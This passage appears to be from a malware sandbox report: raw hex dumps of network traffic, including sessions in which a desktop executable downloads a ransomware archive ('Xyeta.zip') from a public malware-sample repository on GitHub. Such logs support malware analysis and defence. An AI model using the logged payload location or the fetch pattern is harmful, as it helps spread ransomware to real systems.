                                                                                                                                                2022-09-29 12:51:28 UTC7346INData Raw: 41 90 7b 81 c6 d2 f3 8b 75 c9 22 12 8c 8d 78 e4 7b cc 46 89 ea d3 c6 41 a9 00 f9 63 7c 70 e9 2d d6 6c b0 fd 30 c4 21 a4 61 2a 04 78 31 92 05 fc 9d 4c ec 92 09 f1 65 23 db 76 03 56 6a 58 50 e9 88 42 d1 cb c8 90 86 d0 55 21 ea af ed 0f be 73 ac 1f 3b 8c 2b ae 8f eb 88 d8 19 7e f0 88 81 07 3b ae 04 02 1f 39 f4 9f bc 13 d5 d7 a7 da 45 24 cc e3 f4 0b 6e de 51 f8 3b 52 db eb 16 28 f1 e9 8b d3 5e a9 6b c2 ee 4d 60 85 86 bb 0e 96 7a 63 79 b7 29 17 f0 a9 db 54 6a a3 be 92 8c 86 ff 38 02 9c 73 5f f5 1b 0d 57 82 46 bf 91 e5 1d e3 7a 43 ab c5 c6 2b 02 ff c0 2f c8 0a d4 84 99 92 9f 95 c1 f7 c0 62 f7 f2 8e f9 0d 51 f3 92 5d 34 f3 b6 ca bf fa b3 c3 21 a8 d2 45 c2 b5 8b 2f 6e 60 3f 18 6b c5 f2 c0 84 db 59 b4 c2 90 19 3f 37 a6 71 ac bd 2a be 49 cd ed a0 5a f5 3d 01 1f 2a
                                                                                                                                                Data Ascii: A{u"x{FAc|p-l0!a*x1Le#vVjXPBU!s;+~;9E$nQ;R(^kM`zcy)Tj8s_WFzC+/bQ]4!E/n`?kY?7q*IZ=*
                                                                                                                                                2022-09-29 12:51:28 UTC7362INData Raw: 08 9a 8f 47 13 3f 5f 05 8f 1b 4c 02 94 dc cf d6 fb 2e 18 f0 ae 04 94 af e5 9f 10 a4 3d af c0 58 10 02 93 61 ac 75 f9 34 e8 c1 a8 23 7b c1 3b e6 c2 c8 d9 f9 3f 59 ce 08 e8 fe da e9 99 df 76 64 84 56 8c c8 bd 9e 0d 88 f2 af 41 a0 cf 8a c8 f9 37 9d 5c 8e d4 5d d0 ca b8 ab 93 71 a2 48 79 10 c8 35 ab c2 1c 7d f5 fa c2 c5 ba 0f 9f de 7f e5 1e 85 05 15 c5 13 fc 1c bb 8d 38 df c5 dc 56 bd 31 32 6c 18 10 23 de 6d 65 cf 67 2a 2a 03 e0 e6 ae f8 7b e8 f1 15 10 2b 88 8f 54 16 f3 10 7c c9 a3 2f 64 29 21 1a 97 66 f9 0d 38 63 b2 9c f9 e3 55 05 31 1c bc 22 cd d9 dd c0 6f a6 89 db aa f0 1e 44 b8 d6 1e 77 d7 de 2d b7 ea 3f 32 bc 22 d4 af c1 95 e7 9b 80 ab da 17 4c 46 9b 06 bc 51 ab f8 60 f7 1c 54 84 3b 4a 54 a0 74 39 72 90 79 37 19 69 09 a9 39 bd 0c 15 7c b7 fe a1 42 60 64
                                                                                                                                                Data Ascii: G?_L.=Xau4#{;?YvdVA7\]qHy5}8V12l#meg**{+T|/d)!f8cU1"oDw-?2"LFQ`T;JTt9ry7i9|B`d
                                                                                                                                                2022-09-29 12:51:28 UTC7378INData Raw: 21 fe ec 41 a6 01 f2 29 fd 5b 2d 28 59 2b 0c b5 70 f1 26 7e 1a 6d 75 2e c3 22 f2 cb ab a6 5c be 5b 3c 67 ba 55 a6 f8 24 5e 9a d7 2b 63 78 0c 81 6c c3 04 88 2b cf 2f 02 97 a7 be 0b f7 e7 a2 84 02 11 8b 4e a9 c4 d6 d5 11 d0 41 1e c3 db 6e c4 bd 03 ea 64 a7 f8 88 23 de 7a eb a3 91 f8 f6 1f 14 74 48 7c ca d4 c8 ce 9f a4 55 c9 4f 87 21 5d e5 85 e8 33 68 57 c8 31 db 12 2d 0e e2 ae d5 83 91 3f ce 7c 07 20 02 62 c7 49 88 23 f6 c2 93 08 54 01 4c e0 0d ca 49 3a b6 cb 02 5e 27 a7 21 33 90 87 b8 57 b8 07 b6 c6 f5 14 91 1b 08 0c 58 82 5a 49 ae 02 8b be 19 fc ac 2c 57 7c f7 40 0c 46 e6 af d6 25 a1 f2 4f 29 b3 2c e8 60 ab be 10 62 ec da 89 44 25 54 3f 82 32 42 de fd 32 1c 0a f5 4e 2a 9a e1 a9 f6 67 64 78 16 62 c4 0f bb 0e 47 0f d3 a0 66 ed 87 b9 f5 b0 85 7a ce 84 f2 e6
                                                                                                                                                Data Ascii: !A)[-(Y+p&~mu."\[<gU$^+cxl+/NAnd#ztH|UO!]3hW1-?| bI#TLI:^'!3WXZI,W|@F%O),`bD%T?2B2N*gdxbGfz
                                                                                                                                                2022-09-29 12:51:28 UTC7394INData Raw: 98 1f 73 63 4a 7c c0 0f fa 99 2a 4e 3e a1 5e f3 f3 7b 85 1c a8 a3 e2 67 86 6f 64 c0 5d b8 0c 18 e6 c1 13 0f ba 4d 3f e3 4e 33 12 49 41 e6 fe d2 8a a9 43 f7 56 a2 16 02 0d 82 56 1b 98 f2 f4 e0 98 6b 46 5a 59 32 f2 2c 81 f2 2e a5 a6 d3 1f 14 12 fa 83 64 61 62 7b 18 85 08 97 57 8e 1d 72 57 2b 98 e6 64 b2 e0 51 9e 4e 8b 4a b4 5c 18 34 01 d3 41 03 01 13 cc cd f5 f3 ab c8 b4 e2 69 6e 7b 13 f4 86 88 9e 06 68 d9 43 3f 2c 62 8b 1b 1f 46 6a 3d 42 55 ee 2f 28 f5 01 36 b8 28 20 8b ea 50 be df 66 ed c9 ae b8 2c 32 c3 98 ba 70 25 b2 64 f3 82 d4 81 98 dc a6 22 20 3a e5 16 eb e4 6a 6f 47 93 0b 1d 26 4b 4a 6c 6f 24 32 31 72 25 df 87 cf cd de a1 d7 e6 ef 1c ff 5f e9 ac fa b5 7b eb bb 74 9a af 9f 0d a3 6d 46 e4 44 41 b3 e3 d4 1d 87 4b 11 dc 9d f8 df 3e 02 6b 3e 67 17 a2 8c
                                                                                                                                                Data Ascii: scJ|*N>^{god]M?N3IACVVkFZY2,.dab{WrW+dQNJ\4Ain{hC?,bFj=BU/(6( Pf,2p%d" :joG&KJlo$21r%_{tmFDAK>k>g
                                                                                                                                                2022-09-29 12:51:28 UTC7410INData Raw: 03 b8 cd 98 b9 bc ed 0d 12 42 ce 33 04 da c2 b5 3e 58 df ba 84 3d b0 fb 08 69 23 de 83 08 53 f7 b2 9a 25 41 ab e4 18 40 ea 21 5a 68 d5 7f 8f 7f 2f 82 46 85 be 73 0b d0 13 cd 68 7f bd 27 c0 8d f8 9c 85 f1 c7 78 27 ac 93 1c be 15 cf c6 66 d3 83 d0 3d 40 9b 93 e9 5e d2 2d 2c 8f 8f a6 27 d1 41 99 88 f7 13 62 84 f3 cd d1 2b 61 75 74 04 1e 35 0d d8 d0 d4 fa 33 fb 2e 75 04 33 ff 1e 82 82 0b 4e 70 e1 c0 33 fc da ef 59 bd 8f 4f cd 84 f4 cf c5 26 88 d0 40 94 bf d7 5f 0e 13 f9 94 d7 fe 69 89 5f b0 94 1f 88 7a 86 9e a2 2d 20 24 0a 67 a7 c2 16 fe fc f4 eb be 2e 92 d8 76 79 93 d3 03 ab 7b 11 42 cb b0 dd 7e 85 eb 32 d7 a0 9d 20 30 29 af 9b 47 96 c8 b6 2b 54 21 89 f2 a1 a9 2d 0d 67 f1 82 b8 a3 96 03 ff 2e cc 3c bc ee 5b f6 20 07 b1 b7 d8 8d cf 8b 4c 30 0a dd 0a e6 8f 94
                                                                                                                                                Data Ascii: B3>X=i#S%A@!Zh/Fsh'x'f=@^-,'Ab+aut53.u3Np3YO&@_i_z- $g.vy{B~2 0)G+T!-g.<[ L0
                                                                                                                                                2022-09-29 12:51:28 UTC7426INData Raw: 87 cf 10 e5 fc 6c 09 63 00 99 20 6f f2 ff 6d c4 eb cf 57 91 05 5a ee 87 d7 89 1a 6f ce ea 7c c2 12 46 08 2c a0 76 ec 6d 65 65 52 65 29 09 8b 97 70 97 92 a9 bb 33 f6 3f ac 39 17 ac 90 5e 1d d7 17 be 0c e2 d8 7e 62 88 70 70 e0 64 32 01 ce f1 ea 9e 72 07 4c f1 e9 3a 84 a2 7b 53 be 17 92 69 18 c6 37 ca b7 13 ed 49 92 dc 81 6b 81 70 5e cb b7 cb a6 31 41 b3 b1 7d ec 89 12 a4 80 4b 4f ef 7c a7 1c 1a 76 73 b4 6b fe 50 f4 5c ae 8e e1 80 b0 53 6d 0e ab ea dc 33 8a b2 5d fc 5e 72 b0 e5 6a 02 a3 48 7e 3d 1e 48 4f 15 25 ab cc 28 b9 e5 96 9e 70 95 b7 b7 11 05 8e b5 1d c3 d1 a3 50 43 ab ed 86 75 25 83 c6 b3 74 e6 24 6a 7c bf d9 3d 72 01 9c 2f e8 49 6e fa a8 2b 87 6e dd f9 01 41 1e 91 49 58 1e b5 ca c0 87 a1 09 58 5a 9b 0d 4c 8e 27 7d e3 1e 53 dd 49 27 21 27 59 31 2e 6a
                                                                                                                                                Data Ascii: lc omWZo|F,vmeeRe)p3?9^~bppd2rL:{Si7Ikp^1A}KO|vskP\Sm3]^rjH~=HO%(pPCu%t$j|=r/In+nAIXXZL'}SI'!'Y1.j
                                                                                                                                                2022-09-29 12:51:28 UTC7442INData Raw: 8c 7d b7 79 71 91 43 93 ef 6c af 81 f7 08 58 82 ec 37 e6 a7 6a a4 a2 28 c2 84 57 fa e0 f5 ae 80 8a 0e 5b f4 c0 b6 5f 64 da 2b 82 df 7b 80 e0 0d 06 e8 80 6f ac 36 b8 38 60 92 b3 c7 c5 92 ce bd 81 e3 01 fb 3b 31 f3 7f 02 51 44 8f 8d 5f 6f f5 0f 9b ba e3 9a 2d 6d 83 51 0f e5 f3 64 3c 60 71 e4 94 83 96 3b ee 79 1e 92 51 9f 34 1b fe fc 73 10 f3 07 b6 2a 0d 6a d9 81 ba 16 fb 03 e5 b3 2c e7 6d d0 5b 7d 26 c8 b3 9f 18 f6 b0 b9 3e 35 54 f5 57 32 23 af 41 0b a9 b3 82 0a 1e 51 c4 98 aa 9c 6c d5 39 70 78 2f 9e ac 58 31 19 02 cb 3d 07 44 9e 4d 86 78 b2 a7 28 d7 05 e0 66 e0 9d e2 2b 4a 88 72 4a a6 f4 22 28 01 c3 19 80 1c f7 ce 8c 1a 48 e8 78 7b c0 95 1e a4 e6 98 64 a7 02 c3 7b 3b 57 3c b0 db 79 83 26 bc 8d 1e f7 dc 55 f3 06 b2 da 60 78 2d c6 f6 b1 3a 99 bd c9 e7 90 98
                                                                                                                                                Data Ascii: }yqClX7j(W[_d+{o68`;1QD_o-mQd<`q;yQ4s*j,m[}&>5TW2#AQl9px/X1=DMx(f+JrJ"(Hx{d{;W<y&U`x-:
                                                                                                                                                2022-09-29 12:51:28 UTC7458INData Raw: ba a7 26 95 02 89 f6 59 9c 0f bc c3 d1 dd 3c e7 bb 1d 12 ce 28 b7 d3 ad 83 5c 7f e8 c4 32 a5 4b c1 79 04 b6 56 43 82 da 5b 9f 27 b6 ed cd 6a 53 93 4a 67 c7 85 62 ff ee 08 29 e9 d2 36 1c 79 4f 74 8c 2d e7 cb 9d d3 99 e5 5f 03 85 04 aa be 8b 6d bd 6c 58 e6 fd 89 be 67 62 d7 0b 16 4a 0e 90 b5 90 5d af 62 99 44 36 02 3e 6b d8 69 e4 c5 6e 69 01 dc b4 30 96 98 94 72 fa 09 77 f5 1a f2 e6 e6 fb a4 ef cc 0b ab 41 6e 10 9c bb 95 ed ed 42 bc 36 08 0b fd 42 17 f1 3a d4 d9 26 1d 34 83 63 7a 4c 7c 4a 7b f8 46 05 06 61 5d c2 ad 33 67 55 b0 2b 9d 1c 39 65 84 26 13 f9 ea b4 ad 2f 43 8e 2c 82 c3 1d cb 77 f4 99 f8 61 ba 62 40 e2 af 06 a8 d4 52 81 a6 c7 d4 4c c2 bf 67 45 b3 bf 23 9f 95 dd c9 f6 60 0a dc 20 1d 24 60 b3 e7 8b 13 ac 1d 6d c1 03 57 b3 1d 07 2a 1a d7 0e 27 9f 99
                                                                                                                                                Data Ascii: &Y<(\2KyVC['jSJgb)6yOt-_mlXgbJ]bD6>kini0rwAnB6B:&4czL|J{Fa]3gU+9e&/C,wab@RLgE#` $`mW*'
                                                                                                                                                2022-09-29 12:51:28 UTC7474INData Raw: 45 f1 7f b3 b0 5c 74 ec f6 39 a3 bd 9f 74 c8 a1 0b 1a d1 c5 e1 20 3f c4 10 42 87 d6 32 23 4f 3f 55 c7 01 c0 c8 55 9c 04 f5 a4 20 80 8d 34 5a bb 5f eb 22 bf 4e 0e f4 cc 09 95 6f fb 51 22 72 fc 92 ee 88 13 3d fc 7c 1f 7a a7 e0 48 f0 2a 94 06 9e 5b 01 11 61 74 3c 11 03 03 4a 5e d5 56 c5 3c 88 37 f6 a0 f1 21 eb 76 7f 72 24 5a 7a 97 a4 db 15 e7 08 6e 21 7c 64 8a a8 8c 56 31 9d 2e ca a9 81 f1 42 5d 56 cc e1 f4 45 bb af da 6e e5 fd 59 ca d1 6b 23 8c a3 c5 12 2d 16 ee 4b 3e f0 34 b7 27 29 81 26 c1 de ed d4 30 ca 74 d6 6f 83 33 42 82 bd 28 a9 66 51 88 fe c3 42 b1 d4 18 a3 38 2d aa ab fc 2d 1e 18 37 77 3d f1 22 f9 d5 b2 6e 3f 5b 72 6f ed 41 06 a9 62 fa f1 3c ce f3 1f b4 2b 0b ea 9e 59 4b 5b a1 b5 57 74 45 53 bb bd 77 6c 53 65 7e f8 db 87 78 ab 94 bb 0f d9 05 fc c8
                                                                                                                                                Data Ascii: E\t9t ?B2#O?UU 4Z_"NoQ"r=|zH*[at<J^V<7!vr$Zzn!|dV1.B]VEnYk#-K>4')&0to3B(fQB8--7w="n?[roAb<+YK[WtESwlSe~x
                                                                                                                                                2022-09-29 12:51:28 UTC7490INData Raw: 07 ce 8e 79 78 c8 e0 b7 ba d7 62 dc 17 2f 7b 6a e6 b5 7b 60 63 f5 e2 bd af 37 85 aa 31 1c e6 e0 44 56 53 72 99 2a 3a bf 46 ab 97 ae 30 ea a1 cc ee 67 33 11 8b c7 d0 b8 64 b6 4d 02 9b 92 19 aa 58 b2 09 9d cd cc bf 18 f6 a9 02 b0 ec 25 f1 75 0f ea f9 27 c0 70 dc d6 c9 3f 03 cd df f1 c9 0b 46 ba 4b a4 e3 38 4e 94 de d7 af 9e 48 84 e0 e7 f7 cb ed 27 a1 74 ae 92 93 eb d4 03 11 9f 45 b4 23 aa ca a6 96 7f bd c6 52 4a 9f fe 64 ec 41 2c de 14 6a c6 d2 e0 38 71 9b 71 69 50 0e f7 45 55 40 31 10 bc b2 c6 24 b7 53 37 d4 fd fc 00 ea d3 b6 b7 4e 00 09 2b 65 6d 8d 15 18 29 50 b6 f0 43 b1 f2 bd 62 ab d8 9f d7 95 4d 30 e8 de bc fa 40 04 c2 c6 ca 53 14 99 1a 1b e4 f6 77 ba 24 12 e7 ca e5 af c1 ef 5c 69 2f 55 f2 1b 1a 50 5c 40 f9 17 a9 75 6d 12 75 fa 1f 44 c7 bb b8 ea cc 5e
                                                                                                                                                Data Ascii: yxb/{j{`c71DVSr*:F0g3dMX%u'p?FK8NH'tE#RJdA,j8qqiPEU@1$S7N+em)PCbM0@Sw$\i/UP\@umuD^
                                                                                                                                                2022-09-29 12:51:28 UTC7506INData Raw: 08 8e 89 86 ad c5 6a f0 8d c2 83 7f 2d 51 24 50 cf 14 bc b4 0b 6e c7 2f df db c7 13 0d 6c be f5 80 2e fa 6f c6 7c 53 a6 a3 09 a3 c7 2b c5 63 91 78 3f 49 9b 78 d3 27 14 68 4a 0a 15 99 f9 a0 9f 93 5e d4 d5 21 2d 58 8f d0 c2 26 86 20 6b b7 7f b0 4b 34 05 55 9d ef 45 f2 c0 b6 81 89 e4 7d b7 04 1a c7 3b e1 d4 c1 04 a1 a8 96 83 45 2b 77 68 3d 31 49 0f 1c 0f fa ae 80 12 99 2b 08 31 1c ac 2e 62 78 d7 a7 3e cb 65 b7 f0 f9 fe b0 6d f5 24 1c e7 56 72 58 f3 29 05 de 08 87 eb cb 31 69 b5 9d bd 2d 47 19 8e be b2 41 91 6d 03 6b 7a 7b 3c 43 c2 94 6f 0c 5a f4 1e c1 18 f0 f6 5f 18 0f b4 31 47 30 dc 21 34 37 1a 71 65 31 1f 29 42 c9 51 4e 76 f4 3b 6a c2 9c 5d a1 20 ba 8e c8 e7 81 26 4d 59 d7 01 a4 a9 11 f3 b9 13 62 9d 5f d7 d2 35 51 b7 82 85 1f 3c b1 65 10 05 7b e9 3e 75 6a
                                                                                                                                                Data Ascii: j-Q$Pn/l.o|S+cx?Ix'hJ^!-X& kK4UE};E+wh=1I+1.bx>em$VrX)1i-GAmkz{<CoZ_1G0!47qe1)BQNv;j] &MYb_5Q<e{>uj


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                26192.168.2.549726140.82.121.3443C:\Users\user\Desktop\4d44bed6.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                2022-09-29 12:51:29 UTC7519OUTGET /Endermanch/MalwareDatabase/raw/master/ransomwares/Xyeta.zip HTTP/1.1
                                                                                                                                                Host: github.com
                                                                                                                                                2022-09-29 12:51:29 UTC7519INHTTP/1.1 302 Found
                                                                                                                                                Server: GitHub.com
                                                                                                                                                Date: Thu, 29 Sep 2022 12:51:29 GMT
                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                                                Access-Control-Allow-Origin: https://render.githubusercontent.com
                                                                                                                                                Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/Xyeta.zip
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                X-Frame-Options: deny
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                                                                                2022-09-29 12:51:29 UTC7520INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                                                                                Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                27192.168.2.549727185.199.108.133443C:\Users\user\Desktop\4d44bed6.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                2022-09-29 12:51:30 UTC7522OUTGET /Endermanch/MalwareDatabase/master/ransomwares/Xyeta.zip HTTP/1.1
                                                                                                                                                Host: raw.githubusercontent.com
                                                                                                                                                2022-09-29 12:51:30 UTC7522INHTTP/1.1 200 OK
                                                                                                                                                Connection: close
                                                                                                                                                Content-Length: 77102
                                                                                                                                                Cache-Control: max-age=300
                                                                                                                                                Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                Content-Type: application/zip
                                                                                                                                                ETag: "3aa8e4e319c7c273c5d9fc9071b3c14c66404cc71f0c3bd72a0137f90c54bbe3"
                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-Frame-Options: deny
                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                X-GitHub-Request-Id: BC80:0543:E4C491:F3028B:6335934D
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                Date: Thu, 29 Sep 2022 12:51:30 GMT
                                                                                                                                                Via: 1.1 varnish
                                                                                                                                                X-Served-By: cache-mxp6947-MXP
                                                                                                                                                X-Cache: HIT
                                                                                                                                                X-Cache-Hits: 1
                                                                                                                                                X-Timer: S1664455890.283122,VS0,VE104
                                                                                                                                                Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                X-Fastly-Request-ID: c124343a3d74409b0df225cd4fa956b082b295c6
                                                                                                                                                Expires: Thu, 29 Sep 2022 12:56:30 GMT
                                                                                                                                                Source-Age: 0
                                                                                                                                                2022-09-29 12:51:30 UTC7523INData Raw: 50 4b 03 04 14 00 01 00 08 00 3b 0c 3d 3e 89 23 ff 7d 80 2c 01 00 00 50 01 00 14 00 00 00 45 6e 64 65 72 6d 61 6e 63 68 40 58 79 65 74 61 2e 65 78 65 e0 56 04 74 2a 4a 9d b0 12 3a 4b 00 4a 15 97 da eb db 90 28 9e 54 ae ce 0c 86 03 d2 18 7f a9 7a 76 ec 1d b8 f3 06 2b 6a 51 00 b5 73 d8 81 6c 15 ae 27 4f 5a 02 f3 35 ad 61 07 63 7d 2e 8e 3e f1 f3 2b 88 4d e4 5c 81 c5 e4 b7 17 43 2c 63 ab 0f c5 a0 45 17 4c 36 40 6d 6c a0 44 f5 2f 82 26 57 0e b1 66 5e bd c6 8b 13 60 9e 97 dc 8a 06 8b 1f fa 02 54 b6 25 08 75 90 c3 c0 98 58 ae 9e d6 1e c7 c4 25 e8 17 46 ff a0 69 e6 e7 16 27 10 46 8b 84 04 12 ca 52 2d 8c 38 bf 39 66 3a d3 ec fe ff ee 80 c3 64 f1 c7 e2 47 64 d1 42 02 f1 2f de a4 13 00 26 67 12 63 bb 54 97 c0 50 23 d8 5d a0 3e 77 7f 89 26 53 5c 7f 69 13 62 13 98 e6
                                                                                                                                                Data Ascii: PK;=>#},PEndermanch@Xyeta.exeVt*J:KJ(Tzv+jQsl'OZ5ac}.>+M\C,cEL6@mlD/&Wf^`T%uX%Fi'FR-89f:dGdB/&gcTP#]>w&S\ib
                                                                                                                                                2022-09-29 12:51:30 UTC7524INData Raw: 83 57 89 ed 4b aa 09 90 16 7e b6 e5 79 0b 4f 61 87 92 06 55 ed ce a3 f3 03 5f 8c 6e b2 31 a0 02 70 eb fc 13 5c 82 8f cb a3 7d 82 e9 73 29 47 56 cb 7c 7d b8 ee b4 47 16 35 b5 e9 29 d6 06 65 c5 50 8b 65 3f 4c ee e9 62 7a 44 17 13 7b 9d bb 0c d4 39 a4 fd 1f c0 ae 88 f0 6d ae 06 cb e5 72 86 7a 9d a6 be 72 a2 35 b3 8d 62 51 74 ba 41 39 a3 db aa 1a e5 23 bd 8f 61 bd 55 6c 28 fb c3 12 3c 91 5a e4 bd e9 85 57 f2 9e a8 cf 6a 01 61 8c 78 f0 ea 6c f0 eb 99 eb fa 1d a1 9d 6b 60 00 ad f0 58 f1 a7 55 04 a8 ec cc 45 cf 41 af ed 3a 54 28 b2 b6 80 00 f8 f6 cb a9 c0 f0 4e 9e e6 4f b2 a2 3a b8 e1 58 90 a6 7b 22 2a e3 c4 d4 b6 d9 b0 99 42 a3 49 b4 75 65 63 19 ac 98 2f f6 a2 eb 55 e0 49 d1 50 ce 43 60 5a 97 e4 b9 a1 7d bb 6f 12 c1 9f 93 43 e9 ba d5 c8 4c 2d be 27 7b b0 4d b5
                                                                                                                                                Data Ascii: WK~yOaU_n1p\}s)GV|}G5)ePe?LbzD{9mrzr5bQtA9#aUl(<ZWjaxlk`XUEA:T(NO:X{"*BIuec/UIPC`Z}oCL-'{M
                                                                                                                                                2022-09-29 12:51:30 UTC7525INData Raw: 93 ef 83 97 4d 06 85 7b 85 5c 2a 19 d3 78 b1 42 ee cf 1f 21 d2 40 09 25 ac 9d 04 46 ee d3 5e 48 a5 a9 a6 6c 57 7a c5 eb 42 14 f3 df 5e 3c b9 37 28 00 bd 7e d8 ac a0 81 64 2b c1 2b db 8c 2b 3f 4b d8 9d 4f 5b 18 9f 0b f2 f7 67 f5 c8 ff 1c 5f f8 32 13 a0 fa a8 ac 01 0e c7 08 a9 3e 78 de 7b 16 ce 7c bb 0d 9d f7 c6 91 99 d5 5a fd 15 c3 09 1b 32 40 98 6b 2f 4d 82 16 59 7d 06 6c 7c 99 7f 30 88 86 95 83 7d cd f9 a9 e9 b9 d4 20 ad 3c a9 87 82 ba 61 20 63 9e 83 74 1e a3 9b 3b b7 f0 79 fd 9a 30 bc 17 e1 0f 3a 8c d5 4e b7 1f a2 88 45 04 2c 7b 21 92 3f 22 8d 3b 94 88 33 68 d3 54 df 39 53 bb bf 2f ba 2b ec 1b 44 61 01 1a 47 90 08 13 ab bd 02 4b 25 ee 0e 18 a3 9b 00 02 7e 96 9a a7 3c 96 3e 48 32 ae 38 4a bc 15 0b 4a f0 46 ac d6 a2 e1 39 d8 fa ea 81 a6 f8 4b 28 9a 93 ce
                                                                                                                                                Data Ascii: M{\*xB!@%F^HlWzB^<7(~d+++?KO[g_2>x{|Z2@k/MY}l|0} <a ct;y0:NE,{!?";3hT9S/+DaGK%~<>H28JJF9K(
                                                                                                                                                2022-09-29 12:51:30 UTC7527INData Raw: 61 c3 50 77 b4 f4 36 dc 00 e9 66 86 ad 18 be 52 59 02 60 6a e0 7f 1c 2f d0 cf b8 65 b8 c9 63 16 21 04 26 22 44 6b 6c 86 ad a4 89 7e 36 88 f9 04 14 60 f7 74 20 b4 fa 68 3c 2b ac 76 81 e8 e8 4e 9f 88 5f 4e 25 2a 38 19 90 f7 7c f1 08 c7 bb 0f 46 1f f7 11 c6 a8 97 e2 cb bd fa 93 e6 15 c7 0d 7c 2f 05 23 ac c8 57 0b 4a 38 1b 7c 59 d0 22 72 6f 51 74 6d d6 fa 5f 83 ef da cd 1f 69 a8 e0 57 4c d9 5a e7 a0 01 80 e5 85 1c 89 e5 d9 8c fd 01 d1 15 e5 63 08 7b 9d 3d 44 69 7d 31 2a 6c 28 b1 7c be 4b 27 43 68 96 43 bf 1a c0 f0 7b ed 66 38 59 e9 0c 60 35 7c 0e f4 47 cb 30 91 55 82 4d a6 b1 29 7d 33 09 4d 44 c7 e2 9c 51 da 81 26 56 9b 40 1c af 77 0e 74 8a 50 96 97 4a f5 0d 36 ae 73 26 62 12 15 d1 87 e3 ea 47 1c 79 5f e8 35 2a b0 79 79 d4 8b c4 d3 9f e8 40 e6 89 09 e5 fa c7
                                                                                                                                                Data Ascii: aPw6fRY`j/ec!&"Dkl~6`t h<+vN_N%*8|F|/#WJ8|Y"roQtm_iWLZc{=Di}1*l(|K'ChC{f8Y`5|G0UM)}3MDQ&V@wtPJ6s&bGy_5*yy@
                                                                                                                                                2022-09-29 12:51:30 UTC7528INData Raw: 1c 5f b0 02 d9 16 34 4e 7a 93 71 76 c1 3c cc 3d 42 23 b6 9e 75 73 59 93 c4 88 e9 2d 3a ac 26 15 17 89 3d 3f 3f 58 58 c2 99 29 6b d0 27 43 2d e0 f3 2e bf 4f 71 52 9c cb ad 7e c8 d5 85 f9 57 3b c3 00 e3 d8 93 f7 5f 4e a6 76 f8 67 a9 00 bd d3 49 43 30 73 8e f1 1b 1c e8 6e 9b 85 fc e8 2b 3e d3 18 e1 94 3d f7 c2 df dc ef 97 6e 99 a2 77 16 90 da 15 e9 9a 94 c8 a8 35 1e bc 3b 87 fd 16 3c 6d c6 36 8d 78 87 73 c5 3f ca 44 f4 11 2f d6 02 a9 e3 39 1e 4c 9c 08 3e c5 74 8e 7f 94 c9 a4 24 c0 5e 49 04 27 74 ae dc 71 35 70 46 07 ca 34 40 d9 2f 1f 6b d1 b7 0c f6 fa 69 e6 55 15 24 81 99 1a 4a fd 44 22 56 13 78 11 aa 6e 6d 8f e0 46 25 1d e8 ee 3c 3b 90 64 b1 7a 3b b0 6a c5 93 e8 c9 0c 19 25 a4 2d 8b ec c9 7b 0a 89 14 74 d2 44 bf 1d 4b ea 5f 19 2f 8c 94 34 74 d6 78 f7 ce 89
                                                                                                                                                Data Ascii: _4Nzqv<=B#usY-:&=??XX)k'C-.OqR~W;_NvgIC0sn+>=nw5;<m6xs?D/9L>t$^I'tq5pF4@/kiU$JD"VxnmF%<;dz;j%-{tDK_/4tx
